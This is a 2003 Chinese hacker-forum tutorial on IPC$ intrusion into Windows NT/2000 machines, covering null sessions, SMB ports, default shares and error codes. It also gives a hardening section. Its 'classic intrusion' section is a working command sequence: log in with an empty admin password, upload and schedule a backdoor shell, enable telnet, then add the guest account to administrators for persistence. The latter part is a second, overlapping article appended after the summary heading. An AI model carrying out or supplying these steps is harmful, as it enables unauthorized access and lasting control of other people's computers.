一份詳盡的IPC$入侵資料

創(chuàng)建時(shí)間：2003-03-16
文章屬性：原創(chuàng)
文章來源：菜菜鳥社區(qū)http://ccbirds.yeah.net
文 章提交：iqst (papabang_at_qingdaonews.com)

[ccbirds入門級(jí)教程]--各個(gè)擊破1--ipc$入侵

一 嘮叨一下：
網(wǎng)上關(guān)于ipc$入侵的文章可謂多如牛毛,而且也不乏優(yōu)秀之作,攻擊步驟甚至可以說已經(jīng)成為經(jīng)典的模式,因此也沒人愿意再把這已經(jīng)成為定式的東西拿出來擺 弄.
不過話雖這樣說,但我個(gè)人認(rèn)為這些文章講解的并不詳細(xì),對(duì)于第一次接觸ipc$的菜鳥來說,簡(jiǎn)單的羅列步驟并不能解答他們的許多迷惑(你隨便找一個(gè) hack論壇搜一下ipc,看存在的疑惑有多少).
因此我寫了這篇相當(dāng)于解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請(qǐng)馬上回復(fù)!


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的)，它是為了讓進(jìn)程間通信而開放的命名管道，可以通過驗(yàn)證用戶名和密碼獲得相應(yīng)的權(quán) 限,在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。
利用IPC$,連接者甚至可以與目標(biāo)主機(jī)建立一個(gè)空的連接而無需用戶名與密碼(當(dāng)然,對(duì)方機(jī)器必須開了ipc$共享,否則你是連接不上的)，而利用這個(gè)空 的連接，連接者還可以得到目標(biāo)主機(jī)上的用戶列表(不過負(fù)責(zé)的管理員會(huì)禁止導(dǎo)出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實(shí),ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠(yuǎn)程管理而開放的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,而且還打開了默認(rèn) 共享,即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些別有用心者(到底是什么用心?我也不知道,代詞一個(gè))會(huì)利用IPC$，訪 問共享資源,導(dǎo)出用戶列表,并使用一些字典工具，進(jìn)行密碼探測(cè),寄希望于獲得更高的權(quán)限,從而達(dá)到不可告人的目的.

解惑:
1)IPC連接是Windows NT及以上系統(tǒng)中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能，其功能相當(dāng)于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數(shù)，所以不能在Windows 9.x中運(yùn)行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假, 不過現(xiàn)在都2003年了,建議98的同志換一下系統(tǒng)吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對(duì)方關(guān)閉了ipc$共享,你仍然無法建立連接
3)并不是說建立了ipc$連接就可以查看對(duì)方的用戶列表,因?yàn)楣芾韱T可以禁止導(dǎo)出用戶列表


三 建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個(gè)空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個(gè)具有一定權(quán) 限的用戶身份登陸的話,那么你就會(huì)得到相應(yīng)的權(quán)限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結(jié)為獲取目標(biāo)信息、管理目標(biāo)進(jìn)程和服務(wù),上傳木馬并運(yùn)行,如果是2000server，還可以考慮開啟終端服務(wù)方便控制.怎么樣?夠厲害 吧!)
不過你也不要高興的太早,因?yàn)楣芾韱T的密碼不是那么好搞到的,雖然會(huì)有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數(shù),而且現(xiàn)在不比從前了,隨著 人們安全意識(shí)的提高,管理員們也愈加小心了,得到管理員密碼會(huì)越來越難的:(
因此今后你最大的可能就是以極小的權(quán)限甚至是沒有權(quán)限進(jìn)行連接,你會(huì)慢慢的發(fā)現(xiàn)ipc$連接并不是萬能的,甚至在主機(jī)不開啟ipc$共享時(shí),你根本就無法 連接.
所以我認(rèn)為,你不要把ipc$入侵當(dāng)作終極武器,不要認(rèn)為它戰(zhàn)無不勝,它就像是足球場(chǎng)上射門前的傳球,很少會(huì)有致命一擊的效果,但卻是不可缺少的,我覺得 這才是ipc$連接在hack入侵中的意義所在.


四 ipc$與空連接,139,445端口,默認(rèn)共享的關(guān)系
以上四者的關(guān)系可能是菜鳥很困惑的一個(gè)問題,不過大部分文章都沒有進(jìn)行特別的說明,其實(shí)我理解的也不是很透徹,都是在與大家交流中總結(jié)出來的.(一個(gè)有良 好討論氛圍的BBS可以說是菜鳥的天堂)

1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個(gè)用戶或管理員的身份登陸(即以特定的用戶名和密碼進(jìn)行ipc$連接),自然就不能叫做空連接 了.
許多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費(fèi)九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當(dāng)你以空連接登陸時(shí),你沒有任 何權(quán)限(很郁悶吧),而你以用戶或管理員的身份登陸時(shí),你就會(huì)有相應(yīng)的權(quán)限(有權(quán)限誰不想呀,所以還是老老實(shí)實(shí)掃吧,不要偷懶喲).
2)ipc$與139,445端口:
ipc$連接可以實(shí)現(xiàn)遠(yuǎn)程登陸及對(duì)默認(rèn)共享的訪問;而139端口的開啟表示netbios協(xié)議的應(yīng)用,我們可以通過139,445(win2000)端口 實(shí)現(xiàn)對(duì)共享文件/打印機(jī)的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
3)ipc$與默認(rèn)共享
默認(rèn)共享是為了方便管理員遠(yuǎn)程管理而默認(rèn)開啟的共享(你當(dāng)然可以關(guān)閉它),即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或 windows(admin$),我們通過ipc$連接可以實(shí)現(xiàn)對(duì)這些默認(rèn)共享的訪問(前提是對(duì)方?jīng)]有關(guān)閉這些默認(rèn)共享)
  

五 ipc$連接失敗的原因
以下5個(gè)原因是比較常見的:
1)你的系統(tǒng)不是NT或以上操作系統(tǒng);
2)對(duì)方?jīng)]有打開ipc$默認(rèn)共享
3)對(duì)方未開啟139或445端口(惑被防火墻屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯(cuò)誤(空連接當(dāng)然無所謂了)
另外,你也可以根據(jù)返回的錯(cuò)誤號(hào)分析原因：
錯(cuò)誤號(hào)5，拒絕訪問 ： 很可能你使用的用戶不是管理員權(quán)限的，先提升權(quán)限；
錯(cuò)誤號(hào)51，Windows 無法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問題；
錯(cuò)誤號(hào)53，找不到網(wǎng)絡(luò)路徑 ： ip地址錯(cuò)誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動(dòng)；目標(biāo)有防火墻（端口過濾）；
錯(cuò)誤號(hào)67，找不到網(wǎng)絡(luò)名 ： 你的lanmanworkstation服務(wù)未啟動(dòng)；目標(biāo)刪除了ipc$；
錯(cuò)誤號(hào)1219，提供的憑據(jù)與已存在的憑據(jù)集沖突 ： 你已經(jīng)和對(duì)方建立了一個(gè)ipc$，請(qǐng)刪除再連。
錯(cuò)誤號(hào)1326，未知的用戶名或錯(cuò)誤密碼 ： 原因很明顯了；
錯(cuò)誤號(hào)1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng) ： 目標(biāo)NetLogon服務(wù)未啟動(dòng)。（連接域控會(huì)出現(xiàn)此情況）
錯(cuò)誤號(hào)2242，此用戶的密碼已經(jīng)過期 ： 目標(biāo)有賬號(hào)策略，強(qiáng)制定期要求更改密碼。
關(guān)于ipc$連不上的問題比較復(fù)雜，除了以上的原因,還會(huì)有其他一些不確定因素,在此本人無法詳細(xì)而確定的說明,就靠大家自己體會(huì)和試驗(yàn)了.


六  如何打開目標(biāo)的IPC$(此段引自相關(guān)文章)
首先你需要獲得一個(gè)不依賴于ipc$的shell，比如sql的cmd擴(kuò)展、telnet、木馬,當(dāng)然，這shell必須是admin權(quán)限的,然后你可以 使用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)的ipc$。從上面可以知道，ipc$能否使用還有很多條件。請(qǐng)確認(rèn)相關(guān)服務(wù)都已運(yùn)行，沒有就啟動(dòng)它（不知道怎么做的請(qǐng)看net命令的用法）, 還是不行的話（比如有防火墻，殺不了）建議放棄。


七  如何防范ipc$入侵
1禁止空連接進(jìn)行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會(huì)話》)
首先運(yùn)行regedit，找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001(如果設(shè)置為2的話,有一些問題會(huì)發(fā)生,比如一些WIN的服務(wù)出現(xiàn)問題等等)

2禁止默認(rèn)共享
1）察看本地共享資源
運(yùn)行-cmd-輸入net share
2）刪除共享(每次輸入一個(gè)）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以繼續(xù)刪除）
3）停止server服務(wù)
net stop server /y （重新啟動(dòng)后server服務(wù)會(huì)重新開啟）
4）修改注冊(cè)表
運(yùn)行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。
如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節(jié)值）一個(gè)主健再改鍵值。

3永久關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):lanmanserver即server服務(wù)
控制面板-管理工具-服務(wù)-找到server服務(wù)（右擊）-屬性-常規(guī)-啟動(dòng)類型-已禁用

4安裝防火墻(選中相關(guān)設(shè)置)，或者端口過濾(濾掉139,445等),或者用新版本的優(yōu)化大師

5設(shè)置復(fù)雜密碼，防止通過ipc$窮舉密碼


（本教程不定期更新，欲獲得最新版本，請(qǐng)登陸官方網(wǎng)站：菜菜鳥社區(qū)原創(chuàng)http://ccbirds.yeah.net）


八 相關(guān)命令
1)建立空連接:
net use \\IP\ipc$ "" /user:""        (一定要注意:這一行命令中包含了3個(gè)空格)

2)建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼"     (同樣有3個(gè)空格)

3)映射默認(rèn)共享:
net use z: \\IP\c$ "密碼" /user:"用戶名"       (即可將對(duì)方的c盤映射為自己的z盤，其他盤類推)
如果已經(jīng)和目標(biāo)建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$

4)刪除一個(gè)ipc$連接
net use \\IP\ipc$ /del

5)刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會(huì)有提示要求按y確認(rèn)


九 經(jīng)典入侵模式
這個(gè)入侵模式太經(jīng)典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創(chuàng)作者!(不知道是哪位前輩)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運(yùn)氣好到家了)，如果是打算攻擊的話，就可以用這樣的 命令來與127.0.0.1建立一個(gè)連接，因?yàn)槊艽a為"空"，所以第一個(gè)引號(hào)處就不用輸入，后面一個(gè)雙引號(hào)里的是用戶名，輸入 administrators，命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、 d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）。

3. C:\>net time \\127.0.0.1
查查時(shí)間，發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動(dòng)srv.exe吧（這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快，不然你怎么啟動(dòng)啊，呵呵！）

5. C:\>net time \\127.0.0.1
再查查到時(shí)間沒有？如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05，那就準(zhǔn)備開始下面的命令。

6. C:\>telnet 127.0.0.1 99
這里會(huì)用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的 Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個(gè)Telnet服務(wù)！這就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機(jī)上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:\WINNT\system32>ntlm
輸入ntlm啟動(dòng)（這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī)，運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行）。當(dāng)出 現(xiàn)"DONE"的時(shí)候，就說明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來開啟Telnet服務(wù)！

9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進(jìn)入對(duì)方了，操作就像在DOS上操作一樣簡(jiǎn)單！(然后你想做什么?想做什么就做什么吧,哈哈)

為了以防萬一,我們?cè)侔裧uest激活加到管理組    
10. C:\>net user guest /active:yes
將對(duì)方的Guest用戶激活

11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼

12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改，guest賬號(hào)沒改變的話，下次我們可以用guest再次訪問這臺(tái)計(jì)算機(jī))


十 總結(jié):

一 摘要
二 什么是ipc$
三 什么是空會(huì)話
四 空會(huì)話可以做什么
五 ipc$所使用的端口
六 ipc管道在hack攻擊中的意義
七 ipc$連接失敗的常見原因
八 復(fù)制文件失敗的原因
九 關(guān)于at命令和xp對(duì)ipc$的限制
十 如何打開目標(biāo)的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能會(huì)用到的命令
十三 對(duì)比過去和現(xiàn)今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵問答精選

一 摘要
注意：本文所討論的各種情況均默認(rèn)發(fā)生在win NT/2000環(huán)境下，win98將不在此次討論之列。


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源，它是為了讓進(jìn)程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換，從而實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)的訪問。IPC$是NT/2000的一項(xiàng)新功能，它有一個(gè)特點(diǎn)，即在同一時(shí)間內(nèi)，兩個(gè)IP之間只允許建立一個(gè)連接。NT/2000在提供了ipc$功能的同時(shí)，在初次安裝系統(tǒng)時(shí)還打開了默認(rèn)共享，即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導(dǎo)致了系統(tǒng)安全性的降低。
平時(shí)我們總能聽到有人在說ipc$漏洞，ipc$漏洞，其實(shí)ipc$并不是一個(gè)真正意義上的漏洞,我想之所以有人這么說，一定是指微軟自己安置的那個(gè)‘后門’：空會(huì)話（Null session）。那么什么是空會(huì)話呢？


三 什么是空會(huì)話
在介紹空會(huì)話之前，我們有必要了解一下一個(gè)安全會(huì)話是如何建立的。
在Windows NT 4.0中是使用挑戰(zhàn)響應(yīng)協(xié)議與遠(yuǎn)程機(jī)器建立一個(gè)會(huì)話的，建立成功的會(huì)話將成為一個(gè)安全隧道，建立雙方通過它互通信息，這個(gè)過程的大致順序如下： 
1）會(huì)話請(qǐng)求者（客戶）向會(huì)話接收者（服務(wù)器）傳送一個(gè)數(shù)據(jù)包，請(qǐng)求安全隧道的建 
立； 
2）服務(wù)器產(chǎn)生一個(gè)隨機(jī)的64位數(shù)（實(shí)現(xiàn)挑戰(zhàn)）傳送回客戶； 
3）客戶取得這個(gè)由服務(wù)器產(chǎn)生的64位數(shù)，用試圖建立會(huì)話的賬號(hào)的口令打亂它，將結(jié) 
果返回到服務(wù)器（實(shí)現(xiàn)響應(yīng)）； 
4）服務(wù)器接受響應(yīng)后發(fā)送給本地安全驗(yàn)證（LSA），LSA通過使用該用戶正確的口令來核實(shí)響應(yīng)以便確認(rèn)請(qǐng)求者身份。如果請(qǐng)求者的賬號(hào)是服務(wù)器的本地賬號(hào)，核實(shí)本地發(fā)生；如果請(qǐng)求的賬號(hào)是一個(gè)域的賬號(hào)，響應(yīng)傳送到域控制器去核實(shí)。當(dāng)對(duì)挑戰(zhàn)的響應(yīng)核實(shí)為正確后，一個(gè)訪問令牌產(chǎn)生，然后傳送給客戶?？蛻羰褂眠@個(gè)訪問令牌連接到服務(wù)器上的資源直到建議的會(huì)話被終止。
以上是一個(gè)安全會(huì)話建立的大致過程，那么空會(huì)話又如何呢？

空會(huì)話是在沒有信任的情況下與服務(wù)器建立的會(huì)話（即未提供用戶名與密碼），但根據(jù)WIN2000的訪問控制模型，空會(huì)話的建立同樣需要提供一個(gè)令牌，可是空會(huì)話在建立過程中并沒有經(jīng)過用戶信息的認(rèn)證，所以這個(gè)令牌中不包含用戶信息，因此，這個(gè)會(huì)話不能讓系統(tǒng)間發(fā)送加密信息，但這并不表示空會(huì)話的令牌中不包含安全標(biāo)識(shí)符SID（它標(biāo)識(shí)了用戶和所屬組），對(duì)于一個(gè)空會(huì)話，LSA提供的令牌的SID是S-1-5-7，這就是空會(huì)話的SID，用戶名是：ANONYMOUS LOGON（這個(gè)用戶名是可以在用戶列表中看到的，但是是不能在SAM數(shù)據(jù)庫(kù)中找到，屬于系統(tǒng)內(nèi)置的賬號(hào)），這個(gè)訪問令牌包含下面?zhèn)窝b的組： 
Everyone 
Network
在安全策略的限制下，這個(gè)空會(huì)話將被授權(quán)訪問到上面兩個(gè)組有權(quán)訪問到的一切信息。那么建立空會(huì)話到底可以作什么呢？ 


四 空會(huì)話可以做什么 
對(duì)于NT，在默認(rèn)安全設(shè)置下，借助空連接可以列舉目標(biāo)主機(jī)上的用戶和共享，訪問everyone權(quán)限的共享，訪問小部分注冊(cè)表等，并沒有什么太大的利用價(jià)值；對(duì)2000作用更小，因?yàn)樵赪indows 2000 和以后版本中默認(rèn)只有管理員和備份操作員有權(quán)從網(wǎng)絡(luò)訪問到注冊(cè)表，而且實(shí)現(xiàn)起來也不方便，需借助工具。
從這些我們可以看到，這種非信任會(huì)話并沒有多大的用處，但從一次完整的ipc$入侵來看，空會(huì)話是一個(gè)不可缺少的跳板，因?yàn)槲覀儚乃抢锟梢缘玫綉袅斜?，而大多?shù)弱口令掃描工具就是利用這個(gè)用戶列表來進(jìn)行口令猜解的，成功的導(dǎo)出用戶列表大大增加了猜解的成功率，僅從這一點(diǎn)，足以說明空會(huì)話所帶來的安全隱患，因此說空會(huì)話毫無用處的說法是不正確的。以下是空會(huì)話中能夠使用的一些具體命令：


1 首先，我們先建立一個(gè)空連接（當(dāng)然，這需要目標(biāo)開放ipc$）
命令：net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四個(gè)空格，net與use中間有一個(gè)空格，use后面一個(gè)，密碼左右各一個(gè)空格。


2 查看遠(yuǎn)程主機(jī)的共享資源
命令：net view \\ip
解釋：前提是建立了空連接后，用此命令可以查看遠(yuǎn)程主機(jī)的共享資源，如果它開了共享，可以得到如下面的結(jié)果，但此命令不能顯示默認(rèn)共享。

在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間
命令： net time \\ip
解釋：用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間。


4 得到遠(yuǎn)程主機(jī)的NetBIOS用戶名列表（需要打開自己的NBT）
命令：nbtstat -A ip
用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的NetBIOS用戶名列表，返回如下結(jié)果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37


以上就是我們經(jīng)常使用空會(huì)話做的事情，好像也能獲得不少東西喲，不過要注意一點(diǎn)：建立IPC$連接的操作會(huì)在Event Log中留下記錄，不管你是否登錄成功。 好了，那么下面我們就來看看ipc$所使用的端口是什么？


五 ipc$所使用的端口
首先我們來了解一些基礎(chǔ)知識(shí)：
1 SMB:(Server Message Block) Windows協(xié)議族，用于文件打印共享的服務(wù)；
2 NBT:(NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口實(shí)現(xiàn)基于TCP/IP協(xié)議的NETBIOS網(wǎng)絡(luò)互聯(lián)。
3 在WindowsNT中SMB基于NBT實(shí)現(xiàn)，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT實(shí)現(xiàn)，還可以直接通過445端口實(shí)現(xiàn)。

有了這些基礎(chǔ)知識(shí)，我們就可以進(jìn)一步來討論訪問網(wǎng)絡(luò)共享對(duì)端口的選擇了：

對(duì)于win2000客戶端（發(fā)起端）來說：
1 如果在允許NBT的情況下連接服務(wù)器時(shí)，客戶端會(huì)同時(shí)嘗試訪問139和445端口，如果445端口有響應(yīng)，那么就發(fā)送RST包給139端口斷開連接，用455端口進(jìn)行會(huì)話，當(dāng)445端口無響應(yīng)時(shí)，才使用139端口，如果兩個(gè)端口都沒有響應(yīng)，則會(huì)話失??；
2 如果在禁止NBT的情況下連接服務(wù)器時(shí)，那么客戶端只會(huì)嘗試訪問445端口，如果445端口無響應(yīng)，那么會(huì)話失敗。


對(duì)于win2000服務(wù)器端來說：
1 如果允許NBT, 那么UDP端口137, 138, TCP 端口 139, 445將開放（LISTENING）；
2 如果禁止NBT，那么只有445端口開放。


我們建立的ipc$會(huì)話對(duì)端口的選擇同樣遵守以上原則。顯而易見，如果遠(yuǎn)程服務(wù)器沒有監(jiān)聽139或445端口，ipc$會(huì)話是無法建立的。


六 ipc管道在hack攻擊中的意義
ipc管道本來是微軟為了方便管理員進(jìn)行遠(yuǎn)程管理而設(shè)計(jì)的，但在入侵者看來，開放ipc管道的主機(jī)似乎更容易得手。通過ipc管道，我們可以遠(yuǎn)程調(diào)用一些系統(tǒng)函數(shù)（大多通過工具實(shí)現(xiàn)，但需要相應(yīng)的權(quán)限），這往往是入侵成敗的關(guān)鍵。如果不考慮這些，僅從傳送文件這一方面，ipc管道已經(jīng)給了入侵者莫大的支持，甚至已經(jīng)成為了最重要的傳輸手段，因此你總能在各大論壇上看到一些朋友因?yàn)榇虿婚_目標(biāo)機(jī)器的ipc管道而一籌莫展大呼救命。當(dāng)然，我們也不能忽視權(quán)限在ipc管道中扮演的重要角色，想必你一定品嘗過空會(huì)話的尷尬，沒有權(quán)限，開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的權(quán)限，那么ipc管道這把雙刃劍將顯示出它猙獰的一面。


七 ipc$連接失敗的常見原因
以下是一些常見的導(dǎo)致ipc$連接失敗的原因：

1 IPC連接是Windows NT及以上系統(tǒng)中特有的功能，由于其需要用到Windows NT中很多DLL函數(shù)，所以不能在Windows 9.x/Me系統(tǒng)中運(yùn)行，也就是說只有nt/2000/xp才可以相互建立ipc$連接，98/me是不能建立ipc$連接的；


2 如果想成功的建立一個(gè)ipc$連接，就需要響應(yīng)方開啟ipc$共享，即使是空連接也是這樣，如果響應(yīng)方關(guān)閉了ipc$共享，將不能建立連接；


3 連接發(fā)起方未啟動(dòng)Lanmanworkstation服務(wù)（顯示名為：Workstation）：它提供網(wǎng)絡(luò)鏈結(jié)和通訊，沒有它發(fā)起方無法發(fā)起連接請(qǐng)求；


4 響應(yīng)方未啟動(dòng)Lanmanserver服務(wù)（顯示名為：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依賴于此服務(wù)，沒有它主機(jī)將無法響應(yīng)發(fā)起方的連接請(qǐng)求，不過沒有它仍可發(fā)起ipc$連接；


5 響應(yīng)方未啟動(dòng)NetLogon，它支持網(wǎng)絡(luò)上計(jì)算機(jī) pass-through 帳戶登錄身份（不過這種情況好像不多）；


6 響應(yīng)方的139，445端口未處于監(jiān)聽狀態(tài)或被防火墻屏蔽；


7 連接發(fā)起方未打開139，445端口；


8 用戶名或者密碼錯(cuò)誤：如果發(fā)生這樣的錯(cuò)誤，系統(tǒng)將給你類似于'無法更新密碼'這樣的錯(cuò)誤提示（顯然空會(huì)話排除這種錯(cuò)誤）；


9 命令輸入錯(cuò)誤：可能多了或少了空格，當(dāng)用戶名和密碼中不包含空格時(shí)兩邊的雙引號(hào)可以省略，如果密碼為空，可以直接輸入兩個(gè)引號(hào)""即可；


10 如果在已經(jīng)建立好連接的情況下對(duì)方重啟計(jì)算機(jī)，那么ipc$連接將會(huì)自動(dòng)斷開，需要重新建立連接。 


另外,你也可以根據(jù)返回的錯(cuò)誤號(hào)分析原因： 

錯(cuò)誤號(hào)5，拒絕訪問：很可能你使用的用戶不是管理員權(quán)限的； 
錯(cuò)誤號(hào)51，Windows無法找到網(wǎng)絡(luò)路徑：網(wǎng)絡(luò)有問題； 
錯(cuò)誤號(hào)53，找不到網(wǎng)絡(luò)路徑：ip地址錯(cuò)誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動(dòng)；目標(biāo)有防火墻（端口過濾）； 
錯(cuò)誤號(hào)67，找不到網(wǎng)絡(luò)名：你的lanmanworkstation服務(wù)未啟動(dòng)或者目標(biāo)刪除了ipc$； 
錯(cuò)誤號(hào)1219，提供的憑據(jù)與已存在的憑據(jù)集沖突：你已經(jīng)和對(duì)方建立了一個(gè)ipc$，請(qǐng)刪除再連； 
錯(cuò)誤號(hào)1326，未知的用戶名或錯(cuò)誤密碼：原因很明顯了； 
錯(cuò)誤號(hào)1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng)：目標(biāo)NetLogon服務(wù)未啟動(dòng)；
錯(cuò)誤號(hào)2242，此用戶的密碼已經(jīng)過期：目標(biāo)有賬號(hào)策略，強(qiáng)制定期要求更改密碼。